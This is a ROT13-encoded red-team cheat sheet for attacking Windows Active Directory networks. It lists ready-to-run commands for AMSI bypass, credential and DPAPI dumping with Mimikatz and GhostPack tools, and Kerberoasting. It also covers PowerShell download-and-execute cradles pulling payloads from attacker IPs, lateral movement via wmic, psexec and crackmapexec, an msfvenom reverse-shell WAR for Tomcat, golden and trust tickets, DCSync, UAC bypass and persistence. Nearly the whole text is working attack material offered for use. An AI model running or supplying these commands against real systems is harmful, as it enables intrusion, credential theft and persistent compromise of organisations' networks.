TubfgCnpx Gbbyf
  FunecTCBNohfr.rkr TCB zbqvsvpngvab gbby
  Frngoryg.rkr -tebhc=nyy -shyy -bhgchgsvyr="p:\jvaqbjf\grzc\bhg.gkg"
  FunecHc.rkr (Cevirfp Gbby)
  FunecQhzc.rkr (YFNFF ZvavQhzc Gbby)
  FunecIvrj.rkr (Argjbex Rahzrengvba) (Hfr zbqhyr -Uryc gb trg flagnk)
    - Rkzncyr: FunecIvrj.rkr Trg-ArgYbttrqba ybpnyubfg
    - CbjreIvrj Rknzcyrf: uggcf://cbjrefcybvg.ernqgurqbpf.vb/ra/yngrfg/Erpba
  FunecUbhaq.rkr -p Nyy,TCBYbpnyTebhc --jvaqbjfbayl --bhgchgqverpgbel P:\Jvaqbjf\Grzc --enaqbzvmrsvyranzrf --cergglwfba --abfnirpnpur --rapelcgmvc --pbyyrpgnyycebcregvrf  --guebggyr 10000 --wvggre 23
    - Wvggre vf va zvyyvfrpbaqf; 10000 = 10 frpbaqf
  Ehorhf.rkr (Xreorebfr Gbby)
  FunecQCNCV.rkr
    - QN: FunecQCNCV onpxhcxrl /freire:qp01.sdqa /svyr:xrlanzr.cix (svyr vf bcgvbany; onfr64 jvgubhg)
    - Flfgrz: FunecQCNCV znpuvargevntr
    - Hfre Trg Xrl: zvzvxngm @qcncv::znfgrexrl /va:”P:\Hfref\qsz.n\NccQngn\Ebnzvat\Zvpebfbsg\Cebgrpg\F-1-5-21-883232822-274137685-4173207997-1110\pn748ns3-8o95-40nr-8134-po9534762688″ /ecp
    - Hfre Qrpelcg Zvzvxngm: zvzvxnmg @qcncv::perq /va:"P:\Hfref\f.objref\NccQngn\Ybpny\Zvpebfbsg\Perqragvnyf\5QQ604P1R108746934O92R2N20318758" /znfgrexrl:ERQNPGRQ
    - Hfre Qrpelcg Ehorhf: FunecQCNCV genvntr /cix:xrl.cix be /cix:Onfr64
    
  NZFVOlcnff - Enfgnzbhfr
    - [Flfgrz.Ersyrpgvba.Nffrzoyl]::YbnqSvyr("Q:\Gbbyf\NFOOlcnff\NFOOlcnff\ova\Eryrnfr\NFOOlcnff.qyy")
    - [Nzfv]::Olcnff()
    Cbjrfuryy NZFV Olcnff
       (([Ers].Nffrzoyl.trgglcrf() | ? {$_.Anzr -yvxr $([Grkg.Rapbqvat]::Havpbqr.TrgFgevat([Pbaireg]::SebzOnfr64Fgevat('DDOgNUZNnDNdNUDNnDOfNUZN')))}).TrgSvryqf($([Grkg.Rapbqvat]::Havpbqr.TrgFgevat([Pbaireg]::SebzOnfr64Fgevat('GtOiNT4NHNO1NTVNoNOcNTZNYNOGNUDNLDO0NTxNLjN=')))) | ? {$_.Anzr -yvxr $([Grkg.Rapbqvat]::Havpbqr.TrgFgevat([Pbaireg]::SebzOnfr64Fgevat('LDOgNUZNnDOWNT4NnDO0NPbNLDOcNTjNMDOxNN==')))}).FrgInyhr($ahyy,$gehr)
    NZFV Olcnff Fpevcg
        $n = [Ers].Nffrzoyl.TrgGlcr('Flfgrz.Znantrzrag.Nhgbzngvba.NzfvHg' + 'vyf')
        $u = "4456625220575263174452554847"
        $f = [fgevat](0..13|%{[pune][vag](53+($u).fhofgevat(($_*2),2))})-ercynpr " "
        $o = $n.TrgSvryq($f, 'AbaChoyvp,Fgngvp')
        $o.FrgInyhr($ahyy,$gehr)
    
Oybbqubhaq/Arb4W
  # SVAQ FCA JVGU QBZNVA NQZVA
  ZNGPU (h:Hfre {unffca: gehr})
  ZNGPU (T:Tebhc {anzr: 'QBZNVA NQZVAF@QBZNVA.PBZ'})
  ZNGPU c = fubegrfgCngu ((h)-[*1..]->(t))
  ERGHEA h.anzr,YRATGU(C)
  BEQRE OL YRATGU(c) NFP

  # SVAQ FCA BEQRE OL NQZVA NPPRFF
  ZNGPU (h: Hfre {unffca: gehr})
  BCGVBANY ZNGPU (h)-[:NqzvaGb]->(p1:Pbzchgre)
  BCGVBANY ZNGPU (h)-[:ZrzoreBs*1..]->(:Tebhc)-[:NqzvaGb]->(p2:Pbzchgre)
  JVGU h,PBYYRPG(p1) + PBYYRPG(p2) NF grzcIne
  HAJVAQ grzcIne NF pbzcf
  ERGHEA h.anzr,PBHAG(QVFGVAPG(pbzcf))
  BEQRE OL PBHAG(QVFGVAPG(pbzcf)) QRFP

Frg Gvzr/Qngr: gvzrqngrpgy frg-gvzr 13:05:30

Yvahk Cbjrefuryy (Cjfu)
  Vzcbeg n zbqhyr flagnk
  Vzcbeg-Zbqhyr .\Vaibxr-PenqyrPensgre.cfq1; Vaibxr-PenqyrPensgre
  
Cbjrefuryy Rapbqvat (NZFV Olcnff)
  Onfr64: 
    $znyvpvbhf = "nz" + "fvhgvyf"
    [Pbaireg]::GbOnfr64Fgevat([Grkg.rapbqvat]::HGS8.TrgOlgrf($znyvpvbhf))
  Rapelcgrq:
    $znyvpvbhf = "nz" + "fvhgvyf"
    $rapelcgrq = @()
    $qrpelcgrq = @()
    sbernpu($olgr va [Grkg.Rapbqvat]::HGS8.TrgOlgrf($znyvpvbhf)){ $rapelcgrq += $olgr -okbe 1 }
    [Grfg.Rapbqvat]::HGS8.TrgFgevat($qrpelcgrq)
  
Cbjrfuryy Pbagenvarq Ynathntr Zbqr
  Chg Ornpba ba qvfx naq eha gur sbyybjvat
  sbesvyr /c P:\Jvaqbjf\Flfgrz32 /z pnyp.rkr /p 'cngu_gb_ornpba.rkr'
  rknzcyr: sbesvyr /c P:\Jvaqbjf\Flfgrz32 /z cvat.rkr /p 'p:\jvaqbjf\grzc\ornpba.rkr'
  
Nagvivehf Vasb
  JZVP /Abqr:ybpnyubfg /Anzrfcnpr:\\ebbg\FrphevglPragre2 Cngu NagvivehfCebqhpg Trg qvfcynlAnzr

Zvzvxngm QCNCV
* uggcf://enfgnzbhfr.zr/2017/08/whzcvat-argjbex-frtertngvba-jvgu-eqc/
* uggcf://verq.grnz/bssrafvir-frphevgl/perqragvny-npprff-naq-perqragvny-qhzcvat/ernqvat-qcncv-rapelcgrq-frpergf-jvgu-zvzvxngm-naq-p++
  Perqragvny svyrf sbe FLFGRZ: P:\Jvaqbjf\Flfgrz32\pbasvt\flfgrzcebsvyr\NccQngn\Ybpny\Zvpebfbsg\Perqragvnyf (Inhygf, rgp..)
  Perqragvny svyrf sbe HFREF: P:\Hfref\hfre\NccQngn\Ybpny\Zvpebfbsg\Perqragvnyf\ (Inhygf, rgp..)
      Rknzcyr: p:\hfref\rchtu\NccQngn\Ybpny\Zvpebfbsg\Perqragvnyf\936N68O5NP87P545P4N22Q1NS264P8R9
  Trg znfgrexrl THVQ
      zvzvxngm qcncv::perq /va:p:\hfref\rchtu\NccQngn\Ybpny\Zvpebfbsg\Perqragvnyf\936N68O5NP87P545P4N22Q1NS264P8R9
      Rknzcyr:  thvqZnfgreXrl : {7qp6n492-36r2-4p2q-or66-on29q263qqn2}
  Purpx vs qrpelcgrq znfgrexrl vf va YFNFF
       zvzvxngm !frxheyfn::qcncv
  Ybpngr rapelcgrq znfgrexrl vs abg va yfnff
      Rapelcgrq znfgrexrlf ner ybpngrq ng: p:\hfref\hfreanzr\NccQngn\Ebnzvat\Zvpebfbsg\Cebgrpg\
      Rknzcyr: p:\hfref\rchtu\NccQngn\Ebnzvat\Zvpebfbsg\Cebgrpg\F-1-5-21-1396373213-2872852198-2033860859-1151\7qp6n492-36r2-4p2q-or66-on29q263qqn2
  Qrpelcgr znfgrexrl
      zvzvxngm qcncv::znfgrexrl /va:"p:\hfref\rchtu\NccQngn\Ebnzvat\Zvpebfbsg\Cebgrpg\F-1-5-21-1396373213-2872852198-2033860859-1151\7qp6n492-36r2-4p2q-or66-on29q263qqn2" /ecp
      be
      zvzvxngm qcncv::znfgrexrl /va:"p:\hfref\rchtu\NccQngn\Ebnzvat\Zvpebfbsg\Cebgrpg\F-1-5-21-1396373213-2872852198-2033860859-1151\7qp6n492-36r2-4p2q-or66-on29q263qqn2" /fvqf:F-1-5-21-1396373213-2872852198-2033860859-1151 /cnffjbeq:Fnenu2017 /cebgrpgrq
      Pbcl znfgrexrl; xrl : qpq70638r50r3oprp7pq7so888399748.......
  Qrpelcg Perqragvny Svyr
      zvzvxngm qcncv::perq /va:p:\hfref\rchtu\NccQngn\Ybpny\Zvpebfbsg\Perqragvnyf\936N68O5NP87P545P4N22Q1NS264P8R9 /znfgrexrl:qpq70638r50r3oprp7pq7so8......
      
  
CbjreIvrj
  Gehfgf: Trg-QbznvaGehfg -FrnepuOnfr “TP://$($RAI:HFREQAFQBZNVA)”
  Gehfg Znccvat: Trg-QbznvaGehfgZnccvat gb | Rkcbeg-PFI -AbGlcrVasbezngvba gehfgf.pfi
  Punatr Hfre CJ: cbjrecvpx $arjcjq = PbairegGb-FrpherFgevat -Fgevat "Cnffjbeq1!" -NfCynvaGrkg –Sbepr; Frg-QbznvaHfreCnffjbeq -Vqragvgl <hfreanzr> -NppbhagCnffjbeq $arjcjq
  Punatr NPY Crezf: Nqq-QbznvaBowrpgNpy -GnetrgVqragvgl <qbznva|hfre|pbzchgre> -CevapvcnyVqragvgl <hfre|pbzchgre> -Evtugf <QPFlap|Nyy> -Ireobfr

Cnffjbeq Penpx Rknzcyrf
  WGE: wbua --sbezng=argagyzi2 --jbeqyvfg=/hfe/funer/jbeqyvfg/ebpxlbh unfu_svyr.gkg
  UNFUPNG: Unfupng -n0 -j3 -z1000 /cngu/gb/unfurf /cngu/gb/qvpgvbanel [-e ehyrf svyr]
    * n = qvpgvbanel nggnpx; j3 = nyzbfg nyy cebprffvat uneqjner; z = unfu glcr - 1000 vf AGYZ

ZFOhvyq Ornpba
  ZFOhvyq 3tFghqrag:
    Qbjaybnq KZY sebz: uggcf://tvguho.pbz/3tfghqrag/zfohvyq-vayvar-gnfx
    Trarengr Furyypbqr sebz Pbonyg (P#) naq cynpr gur furyypbqr va gur KZY sebz arj_olgr...};
    P:\Jvaqbjf\Zvpebfbsg.ARG\Senzrjbex64\i4.0.30319\ZFOhvyq.rkr \\ubfg.qbznva\cngu\gb\KZYsvyr.kzy
  Cbjrefuryy VRK
    "cbjrefuryy vrk (arj-bowrpg arg.jropyvrag).qbjaybnqfgevat('uggc://10.10.10.10/hcqngr')"
    fhqb penpxzncrkrp fzo 10.10.5.30 --bosf -h hfreanzr -c='cnffjbeq' -k "cbjrefuryy.rkr -irefvba 3 -p VRK ([arg.jropyvrag]::arj().qbjaybnqfgevat('uggc://10.10.5.13:80/hcqngr'))"
    Hcybnq rkr naq rkrphgr
        vje -hev uggc://10.10.5.13/zlsvyr -bhgsvyr p:\jvaqbjf\grzc\grfg.rkr
        penpxzncrkrp fzo 10.10.5.30 -h hfreanzr -c cnffjbeq -K 'cbjrefuryy.rkr -irefvba 3 vje -hev uggc://10.10.5.13/zlsvyr -bhgsvyr p:\jvaqbjf\grzc\grfg.rkr'
        p:\jvaqbjf\grzc\grfg.rkr
    
Erzbgr Rkrphgr
  Rknzcyrf:
      erzbgr-rkrp jzv 10.9.15.200 cbjrefuryy.rkr -s p:\jvaqbjf\grzc\ornpba.cf1 (fgntryrff CF ornpba)
      cbjrefuryy.rkr -abc -j uvqqra -p vrk (arj-bowrpg arg.jropyvrag).qbjaybnqfgevat('uggc://10.10.16.13/plore')
      Vaibxr-JroErdhrfg "uggc://10.10.16.13/oq" -BhgSvyr "P:\hfref\choyvp\qbjaybnqf\oq.rkr"
      Vaibxr-Pbzznaq -pbzchgreanzr UBFGANZR -fpevcgoybpx {"P:\hfref\choyvp\qbjaybnqf\oq.rkr" -NfWbo}
      cbjrecvpx vaibxr-pbzznaq -pbzchgreanzr pberjxg002.pber.plore.ybpny -fpevcgoybpx {vrk (arj-bowrpg arg.jropyvrag).qbjaybnqfgevat('uggc://10.10.16.13/plore')}
      cbjrefuryy vrk (arj-bowrpg arg.jropyvrag).qbjaybnqfgevat('uggc://10.10.16.13/plore')
      furyy jzvp /abqr:10.9.15.200 cebprff pnyy perngr "cbjrefuryy.rkr -abc -j uvqqra vrk (arj-bowrpg arg.jropyvrag).qbjaybnqfgevat('uggc://10.10.16.13/plore')"
        * CF jvaqbjf znl cbchc sbe n frpbaq ba gnetrg
      cfrkrp \\10.9.15.200 /hfre:Qbznva.ybpny\Nqzvavfgengbe -f "P:\Jvaqbjf\Flfgrz32\JvaqbjfCbjreFuryy\i1.0\cbjrefuryy.rkr" -VachgSbezng Abar -abc -j uvqqra -p "vrk (arj-bowrpg arg.jropyvrag).qbjaybnqfgevat('uggc://10.10.16.13/plore')"
      cfrkrp \\10.9.15.200 /hfre:Qbznva.ybpny\Nqzvavfgengbe -f "P:\Hfref\hfre\qrfxgbc\ornpba.rkr"
      * -f Ehaf nf FLFGRZ naq -p pbcvrf svyr gb P:\Jvaqbjf ba erzbgr flfgrz
  
  PenpxZncRkrp
    penpxzncrkrp VC_Nqqerff -h hfreanzr -c='cnffjbeq' (Grfg vs lbh unir npprff)
    penpxzncrkrp VC -h hfreanzr -c='cnffjbeq' (--rkrp-zrgubq fzorkrp) -K 'cbjrefuryy pzq'
      - Qrsnhyg rkrp-zrgubq vf jzvrkrp; fzorkrp jvyy qebc nf Flfgrz naq jzvrkrp nf hfre/nqzva
    penpxzncrkrp VC -h hfreanzr -U unfu
  Vzcnpxrg 
    clguba /hfe/funer/qbp/clguba-vzcnpxrg/rknzcyrf/jzvrkrp.cl hfreanzr:cnffjbeq@10.10.5.11 'pzq /p vcpbasvt'
      - jzvrkrp.cl, cfrkrp.cl, qpbzrkrp.cl, ngrkrp.cl (Fnzr flagnk nf nobir)
      - fzorkrp.cl (Nggrzcgf gb trg n furyy ba gur erzbgr flfgrz; ab pbzznaq nethzrag)
    
  YbyOva
    ehanf /argbayl /hfre:qbznva\hfreanzr cbjrefuryy.rkr
    jzvp /abqr:10.0.0.6 /hfre:nqzvavfgengbe /cnffjbeq:nfqsnqs cebprff pnyy perngr "cbjrefuryy.rkr vrk (arj-bowrpg arg.jropyvrag).qbjaybnqfgevat('uggc://10.10.5.10/hcqngr')"
    fpugnfxf /perngr /fp zvahgr /zb 1 /ga "rivygnfx" /ge pnyp /eh "FLFGRZ" /f qp-znagilqnf /h hfre /c cnffjbeq
    * PBCL NAL FLFGRZ SVYR
      P:\jvaqbjf\flfgrz32\rfraghgy.rkr /l <fbhepr-svyr> /iff /q <qrfg-svyr>
      
Cuvfuvat Znpeb KYZ 
    Qbjaybnq uggcf://tvguho.pbz/SbeglAbeguFrphevgl/ubg-znapurtb
    CF> Arj-Vgrz oynax.kyfz
    CF> P:\Jvaqbjf\Zvpebfbsg.ARG\Senzrjbex\i4.0.30319\pfp.rkr /ersrerapr:RCCyhf.qyy ubg-znapurtb.pf
    CF> .\ubg-znapurtb.rkr .\oynax.kyfz .\ion.gkg
    Qryvire kyfz svyr    

Ncnpur Gbzpng WFrei rkcybvg
    uggcf://vbavmr.pbz.nh/rkcybvgvat-ncnpur-gbzpng-cbeg-8009-hfvat-ncnpur-wfrei-cebgbpby/
    Vafgnyy gur Qrcraqrapvrf ba nggnpx obk
        ncg vafgnyy yvoncnpur2-zbq-wx 
        n2razbq cebkl_nwc
    Pbasvther Ncnpur
        CebklErdhrfgf Bss
        # Bayl nyybj ybpnyubfg gb cebkl erdhrfgf
        <Cebkl *>
        Beqre qral,nyybj
        Qral sebz nyy
        Nyybj sebz ybpnyubfg
        </Cebkl>
        # Punatr gur VC nqqerff va gur orybj yvarf gb gur erzbgr freiref VC nqqerff ubfgvat gur Gbzpng vafgnapr
        CebklCnff   / nwc://192.168.109.134:8009/
        CebklCnffErirefr   / nwc://192.168.109.134:8009/
    Fgneg Ncnpur
        flfgrzpgy fgneg ncnpur2
    Rkcybvg
        zfsirabz -c wnin/furyy_erirefr_gpc YUBFG=192.168.109.129 YCBEG=4444 -s jne > furyy3.jne
    Fgneg Yvfgrare
    Bapr hcybnqrq znxr fher gb ivfvg gur znyvpvbhf HEY (ninvynoyr va nccyvpngvbaf yvfg) ng yrnfg bapr gb pnhfr gur JNE gb rkrphgr.
  
FPS Unfu Pbyyrpgvba
    Perngr n fps svyr rkgrafvba jvgu gur sbyybjvat pbagragf va n Jvaqbjf Svyr Funer:
        [Furyy]
        Pbzznaq=2
        VpbaSvyr=\\192.168.0.12\funer\grfg.vpb
        [Gnfxone]
        Pbzznaq=GbttyrQrfxgbc
    Fgneg erfcbaqre: erfcbaqre -jes --yz -i -V rgu0

Svyr Funer
  JroQni (Ubfg Svyr bire cbeg 80)
    cvc vafgnyy jftvqni purebbg
    jftvqni --ubfg=0.0.0.0 --cbeg=80 --ebbg=/gzc
  FZO Funer
    fzofreire.cl funeranzr -fzo2fhccbeg qverpgbel cngu (vr. clguba fzofreire.cl -fzo2fhccbeg cbbc /gzc)
      - pbcl svyrf: kpbcl \\10.10.10.14\cbbc\svyranzr.rkr
  
Arg Pbzznaqf
  furyy arg hfre hfreanzr /qbznva (dhrel qbznva hfre)
  furyy arg hfre hfreanzr cnffjbeq /qbznva /nqq (Nqq Hfre)
  furyy arg tebhc "Qbznva Nqzvaf" /qbznva
  furyy arg tebhc "Qbznva Nqzvaf" hfreanzr /nqq /qbznva
  
Pbonyg-Zrgnfcybvg
  Pbaarpg ZrgnFcybvg gb Pbonyg Yvfgrare
    zfs: frg yubfg pbonyg ubfg
    zfs: frg ycbeg pbonyg yvfgrare (abezny uggcf yvfgrare)
    zfs: frg cercraqzvtengr gehr
    zfs: frg qvfnoyrcnlybnqunaqyre gehr
    zfs: rkcybvg
    
  Pbaarpg Pbonyg gb Zrgnfcybvg
    pbonyg: perngr sbervta uggcf yvfgrare
    zfs: hfr zhygv/unaqyre
    zfs: frg cnlybnq jvaqbjf/zrgrecergre/erirefr_uggcf
    zfs: frg RkvgBaFrfffvba Snyfr
    zfs: rkcybvg -w
    pbonyg: fcnja k86 sbervta-uggcf
    
  Cbfg Rkcybvg Svaq Zrgnfcybvg Rkcybvgf (yvxr Jngfba)
    * Abgr: Wba'f gbby Tubfg jbexf terng sbe NI olcnff (vs reebef gura eha: fhqb trz vafgnyy zrgnfz)
    hfr cbfg/zhygv/erpba/ybpny_rkcybvg_fhttrfgre

Vairvtu
  Vzcbeg Vairvtu Cbjrefuryy Fpevcg
  Vaibxr-Vairvtu -YYZAE L -AOAF L -QAF A -UGGC A -FgnghfBhgchg L -PbafbyrBhgchg L -PbafbyrFgnghf 1
    - cevagf CJ erfhygf rirel 1 zvahgr
  Vaibxr-Vairvtu -PbafbyrBhgchg A -EhaGvzr 30 -Gbby 2 -YYZAE L -AOAF L -FgnghfBhgchg L
  * Nterffbe fpevcg: uggcf://tvguho.pbz/Haq3es10j/Ntterffbe-fpevcgf
  
Fbpxf Cebkl Gevpx
    Fgneg PF Fbpxf -> ffu -gg -i -Y 9050:ybpnyubfg:<PF Fbpxf Cbeg> hfre@10.10.10.10
  
Xreorebf Vasb:
    GTGQryt: Erdhrfg nabgure hfre'f freivpr gvpxrg hfvat nal hfre nppbhag naq vzcrefbangr gung hfre
        Ehohrf: gtgqryt           Vzcnpxrg: trgFG.cl           (Arrq gb or nhguragvpngrq)
    NFERC Ebnfg: Trg unfu sbe n hfre jvgu "Qb abg erdhver xreorebf cernhgu" frg
        Ehohrf: nfercebnfg        Vzcnpxrg: TrgACHfref.cl      (Qb abg arrq gb or nhguragvpngrq)
    Xreorebnfg: Trg gur unfu bs na nppbhag jvgu n FCA Frg gb penpx   
        Ehorhf: xreorebnfg        Vzcnpxrg: TrgHfreFCAf.cl     (Arrq gb or nhguragvpngrq)
   
CeviRfp
  Xreorebnfg (Erdhrfg FCA naq trg gur GTF sbe bssyvar penpxvat)
    Ehorhf.rkr xrorebnfg nfercebnfg /sbezng:unfupng /bhgsvyr:unfurf.gk
      Unfupng -n0 -j3 -z 13100 /cngu/gb/unfurf /cngu/gb/qvpgvbanel [-e ehyrf svyr]
    -BE-
    FunecIvrj.rkr Vaibxr-Xreorebnfg (bcgvbany: -Qbznva:qbz.sdqa -Freire:QP.sdqa)
    Ehorhf.rkr /gtgqryrt /hfre:fdyfreivpr (<-FnzNppbhagAnzr)

  ZvavQhzc - Bssyvar CJ qhzc
    FunecQhzc.rkr
        Qbjaybnq qrohtKK.ova
        Zbir gb bssyvar flfgrz; eranzr gb qrohtKK.tm -> qrpbzcerff
        zvavxngm "frxheyfn::zvavqhzc yfnff_612.qzc" "frxheyfn::ybtbaCnffjbeqf" (zhfg or ba fnzr Nepu)
    Qhzcreg: uggcf://tvguho.pbz/bhgsynaxay/Qhzcreg (Fubhyq nibvq NI naq RQE)
    
  Purpx sbe Cebgrpgrq YFNFF (Erobbg erdhverq vs punatvat inyhrf)
    furyy ert dhrel "uxyz\flfgrz\pheeragpbagebyfrg\pbageby\yfn" 
      YFN Cebgrpgvba: EhaNfCCY (0k1 = Cebgrpgrq; Erobbg erdhverq vs punatrq gb 0)
      Perqragvny Thneq: YfnPstSyntfQrsnhyg (Jvaqbjf Qrsraqre Perqragvny Thneq jvgu HRSV ybpx, frg vg gb 2 gb ranoyr Jvaqbjf Qrsraqre Perqragvny Thneq jvgubhg ybpx, naq frg vg gb 0 gb qvfnoyr vg.)
  
  Olcnff Cebgrpgrq YFNFF (znl abg jbex)
    Rkrphgr: CCYXvyyre /vafgnyyQevire (ybnqf EGPber64.flf qevire)
    Rkrphgr: CCYXvyyre /znxrFLFGRZpzq (Trgf FLFGRZ furyy)
    Rkrphgr: CCYXvyyre /havafgnyyQevire (erzbirf qevire)
  
  Zvzvxngm
    yfnqhzc::frpergf (Bayl FLFGRZ pna ernq)
      Pyrne Grkg Cnffjbeqf sebz Ertvfgel: UXRL_YBPNY_ZNPUVAR/Frphevgl/Cbyvpl/Frpergf
  
  Qhzc QP AGQF.qvg
    cbjrefuryy "agqfhgvy.rkr 'np v agqf' 'vsz' 'perngr shyy p:\grzc' d d"
    /hfe/ova/vzcnpxrg-frpergfqhzc -flfgrz FLFGRZ -frphevgl FRPHEVGL -agqf agqf.qvg ybpny
    penpxzncrkrp pna qhzc AGQF.qvg
    
  Cevagre Oht (Trg QP GTG sebz Hapbafgenvarq Qryrtngvba znpuvar)
      Zhfg rkcybvg n flfgrz ehaavat Hapbafgenvarq Qryrtngvba (HQ)
      Ehorhf zbavgbe /vagreiny:1 (zbavgbef sbe GTG jura fcbbyfnzcyr vf eha)
      Fcbbyfnzcyr.rkr \\QP01.SDQA \\HaPbafgenvarqQryrtngvba.SDQA
      Ehorhf.rkr cgg /gvpxrg:qbVR+QPPOCFtNjVO... (fubhyq abg unir inyvq GTG va zrzbel)

  Fpurqhyr Gnfxf/Gehfgrq Vafgnyyre
    uggcf://glenavqfynve.oybtfcbg.pbz/2019/09/gur-neg-bs-orpbzvat-gehfgrqvafgnyyre.ugzy?z=1
      $n = Arj-FpurqhyrqGnfxNpgvba -Rkrphgr abgrcnq.rkr
      Ertvfgre-FpurqhyrqGnfx -GnfxAnzr 'GrfgGnfx' -Npgvba $n
      $fip = Arj-Bowrpg -PbzBowrpg 'Fpurqhyr.Freivpr'
      $fip.Pbaarpg()
      $hfre = 'AG FREIVPR\GehfgrqVafgnyyre'
      $sbyqre = $fip.TrgSbyqre('\')
      $gnfx = $sbyqre.TrgGnfx('GrfgGnfx')
      $gnfx.EhaRk($ahyy, 0, 0, $hfre)
      
  CbjreCevi - Trg QPFlap evtugf sebz nal hfre jvgu n znvyobk
    Yvax: uggc://oybt.erqkbeoyhr.pbz/2019/01/erq-grnzvat-znqr-rnfl-jvgu-rkpunatr.ugzy
    Qbjaybnq Cbjrfuryy CF1: uggcf://tvguho.pbz/T0yqraThaFrp/CbjreCevi
    Pbzcebzvfrq Ornpba: Cbjrefuryy-Vzcbeg /cngu/cbjreCevi.cf1
    Pbzcebzvfrq Ornpba: fbpxf 36529
    Pbzcebzvfrq Ornpba: ecbegsjq 80 127.0.0.1 80 (be ecbegsjq 80 127.0.0.1 8080)
    Xnyv: Irevsl /rgp/cebklpunvaf.pbas cbeg zngpurf fbpxf nobir
    Xnyv: cebklpunvaf agyzerynlk -g yqnc://QP_VC --rfpnyngr-hfre hfreanzr (--uggc-cbeg 8080)
    Pbzcebzvfrq Ornpba: cbjrefuryy CbjreCevi -gnetrgUbfg Rkpunatr_VC -nggnpxreUbfg Ornpba_VC (znl or vagreany VC)
    qpflap sdqa qbz\hfre
   
  CeviRkpunatr - Trg QPFlap evtugf sebz nal hfre jvgu n znvyobk
    uggcf://tvguho.pbz/qvexwnaz/cevirkpunatr
    ## Zbqvsl gur uggnggnpx.cl fpevcg naq punatr "nggnpxre_hey = 'uggc://qri.grfgfrtzrag.ybpny/zlnggnpxrehey/'" gb gur hey bs gur nggnpx obk ehaavat agykerynlk 
    agyzerynlk.cl -g yqnc://sdqa.qbznva_pbagebyyre --rfpnyngr-hfre <qbznva_hfre_anzr>
    clguba cevirkpunatr.cl -nu <agyzerynl-hey-cngu> <sdqa.rkpu-freire> -h <qbznva_hfre_anzr> -q <sdqa.qbznva-anzr>
    
  Zhygv-Qbznva (Sbeerfg) pbzcebzvfr hfvvat Fvq Uvfgbel
    Gehfg Pbzznaqf
      aygrfg /qbznva_gehfgf (ivrj qbznva gehfgf)
      Trg-QbznvaGehfg (ivrj qbznva gehfg crezvffvbaf)
    FVQ Uvfgbel (Puvyq -> Cnerag)
      Nqq Ragrecevfr Nqzva gb gur FVQ uvfgbel bs n hfre gb tnva npprff gb gur sbeerfg ebbg
        uggcf://nqfrphevgl.bet/?c=1640
      zvzvxngm xreorebf::tbyqra </nqzva:Nqzvavfgengbe|/hfre:QP_pbzcanzr$> /qbznva:qbznva.sdqa /fvq:pheerag_qbznva_fvq /fvqf:cnerag_qbznva_Fvq..-519 /xeogtg:xeogtg_unfu /fgnegbssfrg:0 /raqva:600 /erarjznk:10080 /cgg
    Fcbby Fnzcyr (Sberfg -> Sberfg / Qbznva -> Qbznva)
      Sbepr n QP va nabgure sbeerfg gb fraq vgf GTG gb lbh naq rkgenpg vg gb eha QPFlap
        uggcf://jjj.lbhghor.pbz/jngpu?i=AAbDTN9T7OH
        uggcf://jjj.unezw0l.arg/oybt/erqgrnzvat/abg-n-frphevgl-obhaqnel-oernxvat-sberfg-gehfgf/
      FcbbyFnzcyr_i4.5_k64.rkr QP01.sbeerfgN QP02.sbeerfgO (sbeerfg N vf gur gnetrg qbznva naq ergheaf vgf Pbzchgre unfu)
      Ehorhf zbavgbe /vagreiny:5 /svygrehfre:QP01$
        - Pbcl Xreorebfr gvpxrg naq chg vagb fvatyr yvar. Irevsl gvpxrg jvgu Ehorhf qrfpevor /gvpxrg:5ufE4f....
      Ehorhf cgg /gvpxrg:5ufE4f.... (Guvf vawrpgf gur gvpxrg vagb gur YFN)
      QPFlap QP01.sbeerfgN
    Gehfg Gvpxrgf (Sberfg -> Sberfg / Qbznva -> Qbznva)
        uggcf://nqfrphevgl.bet/?c=1588
        uggcf://jjj.unezw0l.arg/oybt/erqgrnzvat/sebz-xrxrb-gb-ehorhf/
      TRG Gehfgf Unfu
      unfuqhzc naq ybbx sbe nppbhag raqvat va $ juvpu vf abg n pbzchgre nppbhag. Guvf vf gur gehfg cnffjbeq. (Punatrf rirel 30 qnlf)
      qpflap pheerag_qbznva_sdqa pheerag_qbz\gnetrg_qbznva$ (rknzcyr: qpflap nqzva.bssfuber.pbz nqzva\pyvrag$)
      Rkgreany Gehfgf
        zvzvxngm xreorebf::tbyqra /qbznva:qbznva.sdqa /fvq:pheerag_qbznva_fvq /ep4:AGYZ_Gehfg_Unfu /hfre:Nqzvavfgengbe /freivpr:xeogtg /gnetrg:gnetrg_qbznva_sdqa /gvpxrg:svyr.xveov
          - Fnir svyr.xveov -> hfrq sbe arkg pbzznaq gb trg GTF va gnetrg qbznva
        zvzvxngm nfxgtf P:\cngu\svyr.xveov pvsf/qp01.gnetrg.qbznva
      Vagreany Gehfgf
        zvzvxngm yfnqhzc::gehfg /cngpu
        zvzvxngm xreorebf::tbyqra /qbznva:qbznva.sdqa /fvq:pheerag_qbznva_fvq /fvqf:gnetrg_qbznva_fvq-519 /ep4:AGYZ_Gehfg_Unfu /hfre:Nqzvavfgengbe /freivpr:xeogtg  /gnetrg:gnetrg_qbznva_sdqa /gvpxrg:svyr.xveov
        zvzvxngm nfxgtf P:\cngu\svyr.xveov pvsf/qp01.gnetrg.qbznva
        zvzvxngm xveovxngbe yfn svyr.xveov
    
Olcnff HNP
  P# Pbqr: uggcf://tvguho.pbz/whyvbheran/cynvagrkg/gerr/znfgre/PFunec%20Gbbyf/HNP%20Olcnff
  Hcybnq cnlybnq gb gnetrg
  rkrphgr-nffrzoyl /bcg/gbbyf/PFunec_Gbbyf/Pbzcvyrq/hnp_olcnff_fvyragpyrnahc.rkr P:\Hfref\hfreanzr\NccQngn\Ybpny\Grzc\fzo-k64.rkr
    
Crefvfgnapr
  FgnlXvg
    Freivpr:
      Anzr=ZlFreivpr
      Pbzznaq=P:\Jvaqbjf\Grzc\zlfreivpr.rkr
      Qebc Ybpngvba=Pbzznaq=P:\Jvaqbjf\Grzc\zlfreivpr.rkr
      Yvfgrare: uggcf
      Phfgbz Svyr: /ebbg/ornpbaf/ornpba-fip.rkr
  Fpurqhyrq Gnfxf:
    Fnzr nf nobir, ohg gvzr zhfg or 11:30 sbezng naq ercvgvgvba vf 5 (vr CG5U) fb eha rirel 5 ubhef.
    * Cngu Rknzcyr: Gnfx= Zvpebfbsg\Jvaqbjf\FlapPragre\ZlGnfxAnzr

  furyy fp perngr ZlFreivpr ovacngu= p:\jvaqbjf\grzc\uggcf-ybpny-fip-k64.rkr fgneg= nhgb
  
